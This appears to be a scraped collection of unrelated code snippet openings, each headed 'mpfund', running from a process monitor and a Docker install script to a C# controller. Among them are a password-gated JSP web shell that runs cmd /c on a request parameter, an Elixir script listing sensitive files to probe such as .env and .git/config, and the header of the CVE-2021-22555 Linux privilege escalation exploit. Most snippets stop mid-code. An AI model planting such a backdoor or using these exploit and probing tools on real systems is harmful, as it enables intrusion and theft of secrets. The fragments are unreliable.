mpfund

import psutil
import time
import os

def get_processes():
    """Get a dictionary of current processes with their command lines."""
    processes = {}
    for proc in psutil.process_iter(['pid', 'cmdline']):
        try:
            processes[proc.info['pid']] = proc.info['cmdline']

mpfund

/*
 * Test program for the ambient capabilities
 *
 * compile using:
 * gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c
 * Set effective, inherited and permitted capabilities to the compiled binary
 * sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient
 *
 * To get a shell with additional caps that can be inherited do:
 *

mpfund

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"  version="1.2"> 
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /> 
<jsp:scriptlet> <![CDATA[
    if("zzQzzQ".equals(request.getParameter("pwd"))){ 
String tmp = request.getParameter("i");
try{
String[] cmd = {"cmd", "/c",tmp};
        java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); 
        
java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(in,"GBK"));

mpfund

package main

import (
	"fmt"
	"github.com/miekg/dns"
)

func main() {
	// Create a DNS server instance
	server := &dns.Server{Addr: ":53", Net: "udp"}

mpfund

Mix.install([
  :req,
  :csv,
  :parallel_stream
])

Logger.configure(level: :info)

# Desktop.ini, /.git/config, /.DS_Store, /.subversion/config,
  # Dockerfile, package.json, .env, appsettings.json, secrets.json

mpfund

/*
 * CVE-2021-22555: Turning \x00\x00 into 10000$
 * by Andy Nguyen (theflow@)
 *
 * theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
 * theflow@theflow:~$ ./exploit
 * [+] Linux Privilege Escalation by theflow@ - 2021
 *
 * [+] STAGE 0: Initialization
 * [*] Setting up namespace sandbox...

mpfund

#source https://dzhavat.github.io/2019/07/09/making-http-requests-inside-azure-functions.html
const fetch = require("node-fetch"); // 1

module.exports = async function (context, req) { // 2
    const accessToken = '...';

    const url = 'https://api.github.com/user';
    const headers = {
        'Authorization': `token ${accessToken}`
    };

mpfund

public class HomeController : Controller
{
    private readonly ILogger<HomeController> _logger;

    public HomeController(ILogger<HomeController> logger)
    {
        _logger = logger;
    }

    public IActionResult Index()

mpfund

# New vs project cspoj file format appends .net framework version to output folder
# https://stackoverflow.com/questions/43602782/how-do-i-set-outputpath-in-a-visual-studio-2017-project-new-csproj-file-form
# Search for all projectfiles containing net472 and not AppendTargetFrameworkToOuputPath

Get-ChildItem -Recurse *.csproj | where { ($_ | Select-String net472) -and -not ($_ | Select-String AppendTargetFrameworkToOutputPath) }

mpfund

# source https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-debian-9
sudo apt update
# let apt use package over https
sudo apt install apt-transport-https ca-certificates curl gnupg2 software-properties-common
# add docker gpg key
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
# add docker repository to apt
sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
sudo apt update